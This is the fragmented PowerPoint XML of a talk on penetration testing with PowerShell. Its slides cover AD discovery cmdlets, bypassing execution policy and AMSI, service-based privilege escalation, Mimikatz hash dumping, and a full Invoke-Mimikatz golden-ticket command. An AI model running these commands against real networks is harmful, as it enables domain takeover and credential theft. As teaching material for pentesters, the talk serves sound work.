TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.nullmode.com/blog/2014/06/28/getting-personal-with-powershel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nielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5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netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-execution-polic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mantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586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lackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easi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Penetration testing with PowerShell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5300" y="5710353"/>
            <a:ext cx="3498273" cy="69460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l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Oleksandr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Horbunov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Penetration tester and CTF player</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Зображення, що містить картинка&#10;&#10;Опис створено з високим рівнем достовірності">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51E3BFA3-4A39-453B-A431-EEFEA83A9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" y="5874067"/>
            <a:ext cx="12573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AF35-35B3-4748-9A34-248AEADE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AD Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 8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5E921C77-D729-4A41-B27B-4CC266801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05" r="56128" b="34404"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429491" y="1716013"/>
            <a:ext cx="3800011" cy="40709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4DA486-7F70-4C0D-A4E6-51FA918C3BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1307518" y="5884866"/>
            <a:ext cx="21716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Calibri"/>
              </a:rPr>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>EnumerateLocalAdmins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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C0988-BE65-4A77-9C4D-2148209DD684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6832016" y="2949433"/>
            <a:ext cx="175606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Calibri"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>NetComputer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046BA0F5-626E-4763-96C3-ACD9923FB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105" y="1689804"/>
            <a:ext cx="3383973" cy="1192391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 1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526816A3-051F-4BFF-835C-18719C8FE2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45" t="11072" r="8878" b="56735"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676174" y="3732068"/>
            <a:ext cx="7115554" cy="20492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426567-B002-4639-AEC8-05955BE51CF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6676154" y="5884865"/>
            <a:ext cx="21716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Calibri"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>NetDomainController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138890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C3F5-D307-4955-927D-B5BDDE55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4. Establish  session to the DNS server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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9592B5A-AEE0-4E86-B0C8-D6C275A8D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04" t="8333" r="4743" b="23656"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2129741" y="1782984"/>
            <a:ext cx="7991349" cy="48760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10D9E47-86D0-43CE-A061-819D10D73D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911435" y="1932708"/>
            <a:ext cx="3342408" cy="56284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67A40-8C07-4199-A39D-AF5699B7438C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088571" y="2495548"/>
            <a:ext cx="2086840" cy="109104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8928EA-AC3C-4998-8AAA-FDCCD6FD92EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088571" y="3655867"/>
            <a:ext cx="7836476" cy="1151659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6A7CB5-5D04-444B-8FBB-135C834E7DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132242" y="4508788"/>
            <a:ext cx="2623704" cy="17318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8C74D30-864E-4120-A5E3-8100EEB1A945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2062593" y="4842162"/>
            <a:ext cx="8061612" cy="1013113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F0792A-4069-45C9-BC19-D086936CA1F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4293177" y="3072245"/>
            <a:ext cx="1241715" cy="7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212CB9-AC66-4AE2-8AC2-6F52EF637D6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5860471" y="2630631"/>
            <a:ext cx="185306" cy="2892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ADCE3A-B006-4E48-B42C-C553FA2FB26D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655252" y="293629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Bypass execution policy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2B2C76-8F4C-4D85-B9A4-42B811C58554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8304934" y="3966729"/>
            <a:ext cx="1704109" cy="654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Mimikatz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bloked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by AMSI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:cs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934C98-FC62-49F8-B008-0F9F741F08AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7800108" y="4218709"/>
            <a:ext cx="471056" cy="1004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37E0D1-5BA5-4566-B774-80FE9F1AA24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="139410" y="5213638"/>
            <a:ext cx="15742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Bypass AMSI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E6F51A-8675-4753-A2FD-D8573B0C12DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1430482" y="5349585"/>
            <a:ext cx="481444" cy="12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5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8ED8-9331-46E5-B8CC-52610F82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5. Privilege escalation examples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E7223-1559-4620-9DED-F93E126C447A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866922" y="2318861"/>
            <a:ext cx="520238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Using CVE (Missing patches)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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Run MSI as system (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AlwaysInstallElevated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 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Misconfigured Services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DLL Hijacking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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>NTLM hashes of administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Etc.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82214-90D8-4118-BD54-8693622881BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6330660" y="1819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Remote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28157-243E-437F-A637-49B080B226CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866922" y="4153560"/>
            <a:ext cx="53379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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PowerUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/PowerShellMafia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/PowerSploit/tree/master/Privesc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BeRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/AlessandroZ/BeRoot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Privesc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/enjoiz/Privesc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"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2FB64-BD46-4197-9857-30F7BB9E1B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283036" y="2317173"/>
            <a:ext cx="4202622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>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>By collecting information from shared files and folders</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Analyze services like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> databases, Jenkins, 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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Brute force user passwords.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use different exploits. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Etc.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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1F75D-E598-4FC4-BE48-3BE97ED4362F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6497014" y="5382224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[Screenshot] Searching for vulnerable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5B2CBF-BD4F-4595-A98C-B1095711A733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869196" y="5899688"/>
            <a:ext cx="409284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Tools short description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://bzdww.com/article/318239/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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7E7847-61A2-472D-8F2B-CF61380CE533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867506" y="175469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Local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21AC2F-D843-4D0F-9B1A-C8A0B263014B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867505" y="383287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Automation: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49EDD-5B9B-4D58-A59C-1EB2AD01E945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7816684" y="3963422"/>
            <a:ext cx="41806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PowerUp.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>UserHunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>GroupName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RDPUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Find computers where a domain admin is logged-in.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>UserHunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -Stealth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96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30EF-45FA-40D9-9B81-DEDA7848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j-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>5. Escalate privileges to local admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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0913270A-28F2-4EEE-B49B-1773B2450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413" y="1746295"/>
            <a:ext cx="5752616" cy="46386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CCCEF5-D405-4829-A261-A70E2E0007A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911435" y="3430731"/>
            <a:ext cx="2180556" cy="1803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C07DDA-D70B-4995-AF04-E67B4D22CB99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3573606" y="4526105"/>
            <a:ext cx="1021772" cy="0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37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9439-5A78-4DB0-A20C-1F94D5F5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5. Escalate privileges to local admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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386276-372F-470B-8172-80A726161A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6" r="3160" b="16111"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804931" y="2082128"/>
            <a:ext cx="6698598" cy="29070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C36E73-9B23-4604-8AFD-5FCC6EF2C7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3296966" y="5105399"/>
            <a:ext cx="53928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Using Get-ModifialbleService </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>found vulnerable service and add local admin user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60245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8B81-C44F-406A-80B8-27F6857A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6. Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> to collect NTLM hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture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E12BD29-D35F-4EAD-904B-825F25B1CF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56" t="29094" r="6130" b="11129"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493425" y="2021743"/>
            <a:ext cx="6377034" cy="32571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E53988-9E9F-474E-A554-F7132030E8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4924875" y="550371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Running Mimikatz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4753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2B29-7402-44EC-AF2B-E2732385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6. Run Mimikatz to collect NTLM hashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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FF54272-57B2-4D74-B589-CF4B061FD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47" r="6765" b="12105"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711615" y="2469713"/>
            <a:ext cx="4248302" cy="30842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638D80-DFDD-426E-8B8C-4113D4E36E72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5072079" y="5650921"/>
            <a:ext cx="14616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Calibri"/>
              </a:rPr>
              <a:t>Admiin NTLM hash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A9E09B-548A-4628-8E39-6A32F57C0F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054185" y="4495799"/>
            <a:ext cx="2043544" cy="3896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08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E1E7-3BBA-4A4F-AFD3-ECB21A21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7. Run Mimikatz to collect NTLM hashes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99A235-ABF6-4451-9018-393060692DD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182832" y="2239241"/>
            <a:ext cx="990426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Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:corp.local /sid:S-1-5-21-</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3149556376-1990581062-424258432-500 /krbtgt:ff46a9d8bd66c6efd77603da26796f35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id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'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BEA0C-9ECA-4F27-A43D-B42A0C8E2867}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600033" y="3581398"/>
            <a:ext cx="476076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Example of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>generating Golden ticket for  user corp\Administrator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1703755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136F-1F2A-459C-B71D-9B09FF34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Some tools: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66325-8DB1-47C8-A7D4-280079B59ABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3038225" y="3268499"/>
            <a:ext cx="656185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PowerSploit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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/PowerShellMafia/PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Empire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/EmpireProject/Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>NiShang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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/samratashok/nishang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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PS&gt;Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/jaredhaight/PSAttack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 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4B742-0B1B-4FE9-8019-DAA8D472295F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1592450" y="2296332"/>
            <a:ext cx="59849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The most common PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> frameworks are:</a:t>
            </a:r>
